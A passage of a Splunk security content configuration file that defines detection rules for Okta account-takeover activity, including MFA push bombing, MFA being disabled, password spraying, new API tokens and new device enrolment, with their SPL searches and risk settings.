count(eval(eventType="system.push.send_factor_verify_push")) as pushes by user,_time | stats latest(_time) as lasttime earliest(_time) as firsttime sum(successes) as successes sum(failures) as failures sum(pushes) as pushes by user | eval seconds=lasttime-firsttime | eval lasttime=strftime(lasttime, "%c") | search (pushes>1) | eval totalattempts=successes+failures | eval finding="Normal authentication pattern" | eval finding=if(failures==pushes AND pushes>1,"Authentication attempts not successful because multiple pushes denied",finding) | eval finding=if(totalattempts==0,"Multiple pushes sent and ignored",finding) | eval finding=if(successes>0 AND pushes>3,"Probably should investigate. Multiple pushes sent, eventual successful authentication!",finding) | `okta_mfa_exhaustion_hunt_filter` [ESCU - Okta Mismatch Between Source and Response for Verify Push Request - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic identifies variations in client-based values for source and response events to identify suspicious request behavior. The detection is enhanced if the org is evaluating behavior conditions in sign-on policies using Okta Behavior Detection. NOTE: This detection requires the use of Okta Identity Engine (OIE) and will not function on Okta Classic.\ For each Okta Verify Push challenge, the following two events are recorded in Okta System Log \ Source of Push (Sign-In) \ eventType eq \"system.push.send_factor_verify_push\" \ User Push Response (Okta Verify client) \ eventType eq "user.authentication.auth_via_mfa" AND debugContext.debugData.factor eq "OKTA_VERIFY_PUSH" \ In sequence, the logic for the analytic - \ * Groups by SessionID and retrieves any system.push.send_factor_verify_push events (the source of the push) and user.authentication.auth_via_mfa events where the factor is OKTA_VERIFY_PUSH - (the user response to the push) \ * Counts the total number of push events, successful authentication events, and any push sources where the client is a new device. \ * Creates a ratio of successful sign-ins to pushes. \ * If the ratio (currently tuned aggressively) indicates push spam, or if a user has rejected a push, the detection proceeds to evaluate whether there is more than one IP address used during the session (session roaming) and the presence of both a new IP and new device during the session. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1621"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies variations in client-based values for source and response events to identify suspicious request behavior. The detection is enhanced if the org is evaluating behavior conditions in sign-on policies using Okta Behavior Detection. NOTE: This detection requires the use of Okta Identity Engine (OIE) and will not function on Okta Classic.\ For each Okta Verify Push challenge, the following two events are recorded in Okta System Log \ Source of Push (Sign-In) \ eventType eq \"system.push.send_factor_verify_push\" \ User Push Response (Okta Verify client) \ eventType eq "user.authentication.auth_via_mfa" AND debugContext.debugData.factor eq "OKTA_VERIFY_PUSH" \ In sequence, the logic for the analytic - \ * Groups by SessionID and retrieves any system.push.send_factor_verify_push events (the source of the push) and user.authentication.auth_via_mfa events where the factor is OKTA_VERIFY_PUSH - (the user response to the push) \ * Counts the total number of push events, successful authentication events, and any push sources where the client is a new device. \ * Creates a ratio of successful sign-ins to pushes. \ * If the ratio (currently tuned aggressively) indicates push spam, or if a user has rejected a push, the detection proceeds to evaluate whether there is more than one IP address used during the session (session roaming) and the presence of both a new IP and new device during the session. action.escu.how_to_implement = The analytic leverages Okta OktaIm2 logs to be ingested using the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). action.escu.known_false_positives = False positives may be present based on organization size and configuration of Okta. Monitor, tune and filter as needed. action.escu.creation_date = 2023-03-17 action.escu.modification_date = 2023-03-17 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Mismatch Between Source and Response for Verify Push Request - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover", "Okta MFA Exhaustion"] action.risk = 1 action.risk.param._risk_message = A mismatch between source and response for verifying a push request has occurred for $actor.alternateId$ action.risk.param._risk = [{"risk_object_field": "actor.alternateId", "risk_object_type": "user", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Okta Mismatch Between Source and Response for Verify Push Request - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover", "Okta MFA Exhaustion"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1621"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies variations in client-based values for source and response events to identify suspicious request behavior. The detection is enhanced if the org is evaluating behavior conditions in sign-on policies using Okta Behavior Detection. NOTE: This detection requires the use of Okta Identity Engine (OIE) and will not function on Okta Classic.\ For each Okta Verify Push challenge, the following two events are recorded in Okta System Log \ Source of Push (Sign-In) \ eventType eq \"system.push.send_factor_verify_push\" \ User Push Response (Okta Verify client) \ eventType eq "user.authentication.auth_via_mfa" AND debugContext.debugData.factor eq "OKTA_VERIFY_PUSH" \ In sequence, the logic for the analytic - \ * Groups by SessionID and retrieves any system.push.send_factor_verify_push events (the source of the push) and user.authentication.auth_via_mfa events where the factor is OKTA_VERIFY_PUSH - (the user response to the push) \ * Counts the total number of push events, successful authentication events, and any push sources where the client is a new device. \ * Creates a ratio of successful sign-ins to pushes. \ * If the ratio (currently tuned aggressively) indicates push spam, or if a user has rejected a push, the detection proceeds to evaluate whether there is more than one IP address used during the session (session roaming) and the presence of both a new IP and new device during the session. action.notable.param.rule_title = Okta Mismatch Between Source and Response for Verify Push Request action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `okta` eventType IN (system.push.send_factor_verify_push) OR (eventType IN (user.authentication.auth_via_mfa) debugContext.debugData.factor="OKTA_VERIFY_PUSH") | eval groupby="authenticationContext.externalSessionId" | eval group_push_time=_time | bin span=2s group_push_time | fillnull value=NULL | stats min(_time) as _time by authenticationContext.externalSessionId eventType debugContext.debugData.factor outcome.result actor.alternateId client.device client.ipAddress client.userAgent.rawUserAgent debugContext.debugData.behaviors group_push_time groupby | iplocation client.ipAddress | fields - lat, lon, group_push_time | stats min(_time) as _time dc(client.ipAddress) as dc_ip sum(eval(if(eventType="system.push.send_factor_verify_push" AND "outcome.result"="SUCCESS",1,0))) as total_pushes sum(eval(if(eventType="user.authentication.auth_via_mfa" AND "outcome.result"="SUCCESS",1,0))) as total_successes sum(eval(if(eventType="user.authentication.auth_via_mfa" AND "outcome.result"="FAILURE",1,0))) as total_rejected sum(eval(if(eventType="system.push.send_factor_verify_push" AND "debugContext.debugData.behaviors" LIKE "%New Device=POSITIVE%",1,0))) as suspect_device_from_source sum(eval(if(eventType="system.push.send_factor_verify_push" AND "debugContext.debugData.behaviors" LIKE "%New IP=POSITIVE%",0,0))) as suspect_ip_from_source values(eval(if(eventType="system.push.send_factor_verify_push","client.ipAddress",""))) as src values(eval(if(eventType="user.authentication.auth_via_mfa","client.ipAddress",""))) as dest values(*) as * by groupby | eval ratio = round(total_successes/total_pushes,2) | search ((ratio < 0.5 AND total_pushes > 1) OR (total_rejected > 0)) AND dc_ip > 1 AND suspect_device_from_source > 0 AND suspect_ip_from_source > 0 | `okta_mismatch_between_source_and_response_for_verify_push_request_filter` [ESCU - Okta Multi-Factor Authentication Disabled - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies an attempt to disable multi-factor authentication for an Okta user. An adversary who has obtained access to an Okta tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1556", "T1556.006"], "nist": ["DE.CM"]} action.escu.data_models = ["Change"] action.escu.eli5 = The following analytic identifies an attempt to disable multi-factor authentication for an Okta user. An adversary who has obtained access to an Okta tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users. action.escu.how_to_implement = The analytic leverages Okta OktaIm2 logs to be ingested using the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). action.escu.known_false_positives = Legitimate use case may require for users to disable MFA. Filter lightly and monitor for any unusual activity. action.escu.creation_date = 2024-03-11 action.escu.modification_date = 2024-03-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Multi-Factor Authentication Disabled - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover"] action.risk = 1 action.risk.param._risk_message = MFA was disabled for User [$user$] initiated by [$src$]. Investigate further to determine if this was authorized. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 30}, {"threat_object_field": "src", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Okta Multi-Factor Authentication Disabled - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 60, "impact": 50, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1556", "T1556.006"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies an attempt to disable multi-factor authentication for an Okta user. An adversary who has obtained access to an Okta tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users. action.notable.param.rule_title = Okta Multi-Factor Authentication Disabled action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count max(_time) as lastTime, min(_time) as firstTime from datamodel=Change where sourcetype="OktaIM2:log" All_Changes.object_category=User AND All_Changes.action=modified All_Changes.command=user.mfa.factor.deactivate by All_Changes.user All_Changes.result All_Changes.command sourcetype All_Changes.src | `drop_dm_object_name("All_Changes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_multi_factor_authentication_disabled_filter` [ESCU - Okta Multiple Accounts Locked Out - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes the user.acount.lock event to identify multiple Okta accounts locking out in a short period of time. An adversary attempting to brute force or password spray account names may lock accounts out depending on the threshold set by the organization. Monitoring for multiple account lockouts can help detect potential account takeover attempts or unauthorized access to Okta accounts. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110"], "nist": ["DE.AE"]} action.escu.data_models = ["Change"] action.escu.eli5 = The following analytic utilizes the user.acount.lock event to identify multiple Okta accounts locking out in a short period of time. An adversary attempting to brute force or password spray account names may lock accounts out depending on the threshold set by the organization. Monitoring for multiple account lockouts can help detect potential account takeover attempts or unauthorized access to Okta accounts. action.escu.how_to_implement = The analytic leverages Okta OktaIm2 logs to be ingested using the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). action.escu.known_false_positives = Multiple account lockouts may be also triggered by an application malfunction. Filter as needed, and monitor for any unusual activity. action.escu.creation_date = 2024-03-06 action.escu.modification_date = 2024-03-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Multiple Accounts Locked Out - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover"] action.risk = 1 action.risk.param._risk_message = Multiple accounts locked out in Okta from [$src$]. Investigate further to determine if this was authorized. action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Okta Multiple Accounts Locked Out - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count max(_time) as lastTime, min(_time) as firstTime values(All_Changes.user) as user from datamodel=Change where All_Changes.change_type=AAA All_Changes.object_category=User AND All_Changes.action=modified AND All_Changes.command=user.account.lock by _time span=5m All_Changes.result All_Changes.command sourcetype All_Changes.src | where count > 5 | `drop_dm_object_name("All_Changes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_multiple_accounts_locked_out_filter` [ESCU - Okta Multiple Failed MFA Requests For User - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies multiple failed multi-factor authentication requests for a single user within an Okta tenant. Specifically, the analytic triggers when more than 10 MFA user prompts fail within 10 minutes. The reasons for these failure could be several, like the user not responding in time or receiving multiple duplicate MFA requests. Okta tenants can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1621"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies multiple failed multi-factor authentication requests for a single user within an Okta tenant. Specifically, the analytic triggers when more than 10 MFA user prompts fail within 10 minutes. The reasons for these failure could be several, like the user not responding in time or receiving multiple duplicate MFA requests. Okta tenants can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others. action.escu.how_to_implement = The analytic leverages Okta OktaIm2 logs to be ingested using the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). action.escu.known_false_positives = Multiple Failed MFA requests may also be a sign of authentication or application issues. Filter as needed and monitor for any unusual activity. action.escu.creation_date = 2024-03-05 action.escu.modification_date = 2024-03-05 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Multiple Failed MFA Requests For User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover"] action.risk = 1 action.risk.param._risk_message = Multiple failed MFA requests for user [$src_user$] from IP Address - [$src_ip$]. Investigate further to determine if this was authorized. action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "src_user", "risk_object_type": "user", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Okta Multiple Failed MFA Requests For User - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 70, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1621"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `okta` eventType=user.authentication.auth_via_mfa outcome.result=FAILURE debugContext.debugData.factor!=PASSWORD_AS_FACTOR | bucket _time span=5m | stats count min(_time) as firstTime max(_time) as lastTime values(displayMessage) values(src_ip) as src_ip values(debugContext.debugData.factor) by _time src_user | where count >= 5 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_multiple_failed_mfa_requests_for_user_filter` [ESCU - Okta Multiple Failed Requests to Access Applications - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic identifies multiple failed app requests in an attempt to identify the reuse a stolen web session cookie. The logic of the analytic is as follows: \ * Retrieves policy evaluation and SSO details in events that contain the Application requested \ * Formats target fields so we can aggregate specifically on Applications (AppInstances) \ * Groups by User, Session and IP \ * Creates a ratio of successful SSO events to total MFA challenges related to Application Sign On Policies \ * Alerts when more than half of app sign on events are unsuccessful, and challenges were unsatisfied for more than three apps. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550.004", "T1538"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies multiple failed app requests in an attempt to identify the reuse a stolen web session cookie. The logic of the analytic is as follows: \ * Retrieves policy evaluation and SSO details in events that contain the Application requested \ * Formats target fields so we can aggregate specifically on Applications (AppInstances) \ * Groups by User, Session and IP \ * Creates a ratio of successful SSO events to total MFA challenges related to Application Sign On Policies \ * Alerts when more than half of app sign on events are unsuccessful, and challenges were unsatisfied for more than three apps. action.escu.how_to_implement = This analytic is specific to Okta and requires Okta:im2 logs to be ingested. action.escu.known_false_positives = False positives may be present based on organization size and configuration of Okta. action.escu.creation_date = 2023-03-17 action.escu.modification_date = 2023-03-17 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Multiple Failed Requests to Access Applications - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Okta Multiple Failed Requests to Access Applications - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 70, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550.004", "T1538"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `okta` target{}.type=AppInstance (eventType=policy.evaluate_sign_on outcome.result=CHALLENGE) OR (eventType=user.authentication.sso outcome.result=SUCCESS) | eval targets=mvzip('target{}.type', 'target{}.displayName', ": ") | eval targets=mvfilter(targets LIKE "AppInstance%") | stats count min(_time) as _time values(outcome.result) as outcome.result dc(eval(if(eventType="policy.evaluate_sign_on",targets,NULL))) as total_challenges sum(eval(if(eventType="user.authentication.sso",1,0))) as total_successes by authenticationContext.externalSessionId targets actor.alternateId client.ipAddress | search total_challenges > 0 | stats min(_time) as _time values(*) as * sum(total_challenges) as total_challenges sum(total_successes) as total_successes values(eval(if("outcome.result"="SUCCESS",targets,NULL))) as success_apps values(eval(if(":outcome.result"!="SUCCESS",targets,NULL))) as no_success_apps by authenticationContext.externalSessionId actor.alternateId client.ipAddress | fillnull | eval ratio=round(total_successes/total_challenges,2), severity="HIGH", mitre_technique_id="T1538", description="actor.alternateId". " from " . "client.ipAddress" . " seen opening " . total_challenges . " chiclets/apps with " . total_successes . " challenges successfully passed" | fields - count, targets | search ratio < 0.5 total_challenges > 2 | `okta_multiple_failed_requests_to_access_applications_filter` [ESCU - Okta Multiple Users Failing To Authenticate From Ip - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies instances where multiple users (more than 10 unique accounts) have failed to authenticate from a single IP address within a short time span (5 minutes) within an Okta tenant. Such a pattern can be indicative of malicious activities, such as brute-force attacks or password spraying attempts. Identifying and responding to such patterns promptly is crucial to prevent potential account compromises and unauthorized access to organizational resources. If the detection is a true positive, it suggests that an external entity is actively trying to breach security by targeting multiple user accounts. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110.003"], "nist": ["DE.AE"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = This analytic identifies instances where multiple users (more than 10 unique accounts) have failed to authenticate from a single IP address within a short time span (5 minutes) within an Okta tenant. Such a pattern can be indicative of malicious activities, such as brute-force attacks or password spraying attempts. Identifying and responding to such patterns promptly is crucial to prevent potential account compromises and unauthorized access to organizational resources. If the detection is a true positive, it suggests that an external entity is actively trying to breach security by targeting multiple user accounts. action.escu.how_to_implement = The analytic leverages Okta OktaIm2 logs to be ingested using the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). action.escu.known_false_positives = A source Ip failing to authenticate with multiple users in a short period of time is not common legitimate behavior. action.escu.creation_date = 2024-03-06 action.escu.modification_date = 2024-03-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Multiple Users Failing To Authenticate From Ip - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover"] action.risk = 1 action.risk.param._risk_message = Multiple users failing to authenticate from a single source IP Address - [$src$]. Investigate further to determine if this was authorized. action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Okta Multiple Users Failing To Authenticate From Ip - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count max(_time) as lastTime, min(_time) as firstTime dc(Authentication.user) as unique_accounts values(Authentication.signature) as signature values(Authentication.user) as user values(Authentication.app) as app values(Authentication.authentication_method) as authentication_method from datamodel=Authentication where Authentication.action="failure" AND Authentication.signature=user.session.start by _time span=5m Authentication.src sourcetype | where unique_accounts > 9 | `drop_dm_object_name("Authentication")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_multiple_users_failing_to_authenticate_from_ip_filter` [ESCU - Okta New API Token Created - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies when a new API token is created within an Okta tenant. An adversary may create a new API token to maintain persistence within the environment. Monitoring for new API tokens can help detect potential account takeover attempts or unauthorized access to Okta accounts. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Change"] action.escu.eli5 = The following analytic identifies when a new API token is created within an Okta tenant. An adversary may create a new API token to maintain persistence within the environment. Monitoring for new API tokens can help detect potential account takeover attempts or unauthorized access to Okta accounts. action.escu.how_to_implement = The analytic leverages Okta OktaIm2 logs to be ingested using the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). action.escu.known_false_positives = False positives may be present. Tune Okta and tune the analytic to ensure proper fidelity. Modify risk score as needed. action.escu.creation_date = 2022-09-21 action.escu.modification_date = 2022-09-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta New API Token Created - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover"] action.risk = 1 action.risk.param._risk_message = A new API token was created in Okta by [$user$]. Investigate further to determine if this was authorized. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Okta New API Token Created - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies when a new API token is created within an Okta tenant. An adversary may create a new API token to maintain persistence within the environment. Monitoring for new API tokens can help detect potential account takeover attempts or unauthorized access to Okta accounts. action.notable.param.rule_title = Okta New API Token Created action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count max(_time) as lastTime, min(_time) as firstTime from datamodel=Change where All_Changes.action=created AND All_Changes.command=system.api_token.create by _time span=5m All_Changes.user All_Changes.result All_Changes.command sourcetype All_Changes.src All_Changes.action All_Changes.object_category | `drop_dm_object_name("All_Changes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_new_api_token_created_filter` [ESCU - Okta New Device Enrolled on Account - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies when a new device is enrolled on an Okta account. This behavior is indicative of a user adding a new device to their account. This activity is common when a user is setting up a new device or when a user has lost access to their previous device. However, this activity can also be indicative of an adversary adding a new device to an account to maintain access to an account. Monitoring for this activity can help detect potential account takeover attempts or unauthorized access to Okta accounts. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.005"], "nist": ["DE.CM"]} action.escu.data_models = ["Change"] action.escu.eli5 = The following analytic identifies when a new device is enrolled on an Okta account. This behavior is indicative of a user adding a new device to their account. This activity is common when a user is setting up a new device or when a user has lost access to their previous device. However, this activity can also be indicative of an adversary adding a new device to an account to maintain access to an account. Monitoring for this activity can help detect potential account takeover attempts or unauthorized access to Okta accounts. action.escu.how_to_implement = The analytic leverages Okta OktaIm2 logs to be ingested using the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). action.escu.known_false_positives = It is possible that the user has legitimately added a new device to their account. Please verify this activity. action.escu.creation_date = 2024-03-8 action.escu.modification_date = 2024-03-8 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta New Device Enrolled on Account - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover"] action.risk = 1 action.risk.param._risk_message = A new device was enrolled on an Okta account for user [$user$]. Investigate further to determine if this was authorized. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 24}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Okta New Device Enrolled on Account - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 60, "impact": 40, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies when a new device is enrolled on an Okta account. This behavior is indicative of a user adding a new device to their account. This activity is common when a user is setting up a new device or when a user has lost access to their previous device. However, this activity can also be indicative of an adversary adding a new device to an account to maintain access to an account. Monitoring for this activity can help detect potential account takeover attempts or unauthorized access to Okta accounts. action.notable.param.rule_title = Okta New Device Enrolled on Account action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count max(_time) as lastTime, min(_time) as firstTime from datamodel=Change where All_Changes.action=created All_Changes.command=device.enrollment.create by _time span=5m All_Changes.user All_Changes.result All_Changes.command sourcetype All_Changes.src All_Changes.action All_Changes.object_category | `drop_dm_object_name("All_Changes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_new_device_enrolled_on_account_filter` [ESCU - Okta Phishing Detection with FastPass Origin Check - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic identifies when Okta''s FastPass prevents known phishing sites. When your users are enrolled in FastPass, Okta can provide defenders a high-fidelity signal for when user applications are being targeted by attackers wielding real-time (AiTM) proxies. Okta''s Defensive Cyber Operations team routinely identifies phishing infrastructure configured to imitate an Okta 